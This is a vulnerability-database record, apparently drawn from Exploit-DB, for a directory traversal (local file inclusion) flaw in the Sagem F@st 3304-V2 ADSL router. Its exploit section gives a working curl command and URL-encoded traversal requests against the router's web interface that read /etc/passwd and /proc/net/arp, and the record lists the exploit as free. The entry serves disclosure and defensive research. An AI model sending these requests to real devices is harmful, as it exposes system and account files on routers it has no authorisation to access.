ID
VAR-E-201503-0451
EDB ID
36241
TITLE
Sagem F@st 3304-V2 - Local File Inclusion - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Sagem F@st 3304-V2 - Local File Inclusion. CVE-119605 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | sagem | model: | f@st | scope: | eq | version: | 3304-v2 | Trust: 1.0 |
vendor: | sagem | model: | [email protected] | scope: | eq | version: | 3304-v2 | Trust: 0.6 |
EXPLOIT
# Title : Sagem F@st 3304-V2 Directory Traversal Vulnerability
# Vendor : http://www.sagemcom.com
# Severity : High
# Tested Router : Sagem F@st 3304-V2 (3304, other versions may also be affected)
# Date : 2015-03-01
# Author : Loudiyi Mohamed
# Contact : Loudiyi.2010@gmail.com
# Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603
# Vulnerability description:
Sagem Fast is an ADSL Router using a web management interface in order to change configuration
settings. The router is Sagem Fast is an ADSL Router using a web management interface in order
to change configuration settings.
The web server of the router is vulnerable to directory traversal which allows reading files
by sending encoded '../' requests.
The vulnerability may be tested with the following command-line:
curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd
Or directly from navigateur:
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Local File Inclusion
Trust: 1.0
CREDITS
Loudiyi Mohamed
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 36241 | Trust: 1.6 |
db: | EDBNET | id: | 57594 | Trust: 0.6 |
REFERENCES
url: | https://www.exploit-db.com/exploits/36241/ | Trust: 0.6 |
SOURCES
db: | EXPLOIT-DB | id: | 36241 |
db: | EDBNET | id: | 57594 |
LAST UPDATE DATE
2022-07-27T09:24:36.728000+00:00
SOURCES RELEASE DATE
db: | EXPLOIT-DB | id: | 36241 | date: | 2015-03-03T00:00:00 |
db: | EDBNET | id: | 57594 | date: | 2015-03-03T00:00:00 |